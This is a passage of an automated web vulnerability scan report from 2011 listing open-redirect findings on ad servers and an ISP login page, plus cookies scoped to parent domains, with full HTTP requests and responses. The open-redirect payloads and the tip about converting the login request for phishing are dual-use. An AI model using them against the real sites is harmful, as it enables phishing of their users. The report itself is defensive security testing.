Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jun 09 16:26:18 CDT 2009
Valid to:  Tue Jul 05 18:58:16 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

12. Open redirection
There are 3 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


12.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ru parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//adc73517902d7a9d8/a%3fhttp%3a//ds.serving-sys.com/BurstingRes//Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg was submitted in the ru parameter. This caused a redirection to the following URL:

Request

GET /BurstingPipe/adServer.bs?cn=cdi&ai=3342702&p=&pi=0&ru=http%3a//adc73517902d7a9d8/a%3fhttp%3a//ds.serving-sys.com/BurstingRes//Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg&ord=32746407266802946 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgz0aR600001iN4OaLyu0d9d00000; B3=98IM0000000000uz6rGx0000000001uE9v950000000001uz94DX0000000002uz; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; C4=

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 95
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://adc73517902d7a9d8/a?http://ds.serving-sys.com/BurstingRes//Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:20 GMT
Connection: close

HTTP://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg

12.2. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cmap.am.ace.advertising.com
Path:   /amcm.ashx

Issue detail

The value of the admeld_callback request parameter is used to perform an HTTP redirect. The payload http%3a//aefdfd3111aa74563/a%3fhttp%3a//tag.admeld.com/match was submitted in the admeld_callback parameter. This caused a redirection to the following URL:

Request

GET /amcm.ashx?admeld_adprovider_id=1&admeld_call_type=redirect&admeld_callback=http%3a//aefdfd3111aa74563/a%3fhttp%3a//tag.admeld.com/match HTTP/1.1
Host: cmap.am.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BQQHQ3EBAAAABAAAAMAAgEA; BASE=x7Q9Di23SwnkpMdYS8Ne5ru2BcaVK0B!; ROLL=U6APBje2uuEWubpKMml2fH2mYRDmKrC!

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 15 May 2011 18:44:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Pragma: no-cache
Location: http://aefdfd3111aa74563/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=dfEqewWn_DjocekKUPGvGuhGZ-Q&expiration=1308062645
Cache-Control: private, max-age=0, no-cache, max-age=3600
Expires: Sun, 15 May 2011 18:44:05 GMT
Content-Length: 0


12.3. https://orcres.cosmos.net.nz/orconmembersarea.php [failureurl parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://orcres.cosmos.net.nz
Path:   /orconmembersarea.php

Issue detail

The value of the failureurl request parameter is used to perform an HTTP redirect. The payload http%3a//ac6c55bde109bc9c9/a%3fhttp%3a//www.orcon.net.nz/site/login/%3d%26result%3dfailure was submitted in the failureurl parameter. This caused a redirection to the following URL:

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable viable exploitation in a phishing attack.

Request

GET /orconmembersarea.php?username=&password=&failureurl=http%3a//ac6c55bde109bc9c9/a%3fhttp%3a//www.orcon.net.nz/site/login/%3d%26result%3dfailure HTTP/1.1
Host: orcres.cosmos.net.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 17:29:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Location: http://ac6c55bde109bc9c9/a?http://www.orcon.net.nz/site/login/=&result=failure
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


13. Cookie scoped to parent domain
There are 48 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1791096;62782476;240287920;41831472&migRandom=2359013&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=safety&t=250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:38:35 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=2814750682866683; path=/; expires=Fri, 08-Jun-12 18:38:35 GMT; domain=.mookie1.com
Set-Cookie: session=1305484715|1305484715; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

13.2. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5er1djjd2s63lr1rh2vvchfv73; expires=Tue, 07-Jun-2011 21:12:14 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 15 May 2011 17:38:54 GMT
ETag: "159583e07d836a01cec54377c803643f"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7276
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.3. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:56 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=tndtr8p6iqd7ndif60e5nmkbu4; expires=Tue, 07-Jun-2011 21:12:16 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 15 May 2011 17:33:14 GMT
ETag: "d4a42fec59b612e477d9d39be04e83be"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.4. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1197387J73320110126233349&flash=10&time=0|13:35|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/3/0/%2a/k%3B237711306%3B0-0%3B2%3B58756654%3B4307-300/250%3B40588687/40606474/1%3B%3B%7Eaopt%3D2/1/6b/1%3B%7Esscs%3D%3f$CTURL$&pos=x&r=0.6301347056869417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6418033024623919&output=html&h=250&slotname=1122094293&w=300&ea=0&flash=10.3.181&url=http%3A%2F%2Fwww.tagged.com%2F&dt=1305484543735&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305484543755&frm=1&adk=2814374565&ga_vid=1669351923.1305484544&ga_sid=1305484544&ga_hid=2114303632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=241114598&fu=0&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 2385
Set-Cookie:PRID=A32A4853-1E1A-43A8-816D-90F9F42BE2AB; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=Eo1TOtSCI;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJZfEo1TOtSCI!BVBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=54A30400-B5CE-8820-1309-65F000550101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKAt*1646:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKAtAA08:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FB4h:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GBnW:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FB4hGBnW:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

13.5. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adscgen/sta.php?survey_num=898849&site=1197387&code=1436872&ut_sys=pointroll HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6418033024623919&output=html&h=250&slotname=1122094293&w=300&ea=0&flash=10.3.181&url=http%3A%2F%2Fwww.tagged.com%2F&dt=1305484543735&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305484543755&frm=1&adk=2814374565&ga_vid=1669351923.1305484544&ga_sid=1305484544&ga_hid=2114303632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=241114598&fu=0&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1; ES=845473-OaS)M-0

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:49 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Sat, 15-May-2010 18:35:48 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-1; expires=Thu, 05-Jul-2012 10:35:49 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_898849-k.h)M-0; expires=Thu, 05-Jul-2012 10:35:49 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=pointroll&survey_num=898849&site=1197387-1197387-&code=1436872
Content-Length: 44
Content-Type: text/html

/* /adsc/d898849/1197387/1436872/randm.js */

13.6. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=7198000&rn=1140352054&c7=http%3A%2F%2Fwww.tagged.com%2F&c4=www.tagged.com%2Findex.html&c15=acfce1cd086cbc82e14401387f64e37ade360744&c8=Tagged&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 15 May 2011 18:35:34 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Tue, 14-May-2013 18:35:34 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.7. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=2&c2=6906514&c3=&c4=http%3A%2F%2Fvtr.com%2Findex.html&c5=&c6=&c7=http%3A%2F%2Fvtr.com%2Findex.html&c8=&c9=&c10=CERT&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://vtr.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 15 May 2011 18:23:54 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Tue, 14-May-2013 18:23:54 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.8. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Set-Cookie: V=tRT1MopEi6hc; Domain=.contextweb.com; Expires=Wed, 09-May-2012 18:35:35 GMT; Path=/
Set-Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; Domain=.contextweb.com; Expires=Mon, 18-Apr-2016 18:35:35 GMT; Path=/
Content-Type: image/gif
Date: Sun, 15 May 2011 18:35:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

13.9. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=72375&rnd=725398.7372448546 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgz0aR600001iN4OaLyu0d9d00000; B3=98IM0000000000uz6rGx0000000001uE9v950000000001uz94DX0000000002uz; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; C4=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: ActivityInfo=000iPlceV%5f; expires=Sat, 13-Aug-2011 13:23:08 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:07 GMT
Connection: close
Content-Length: 24

//Conversion Was Written

13.10. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1686177&Page=&PluID=0&Pos=9946 HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.orcon.net.nz/business
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR6aNgL4; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:37 GMT
Connection: close


13.11. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1686177&Page=&PluID=0&Pos=9946 HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR600004; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_9946=3342702
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:36 GMT
Connection: close


13.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=0&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

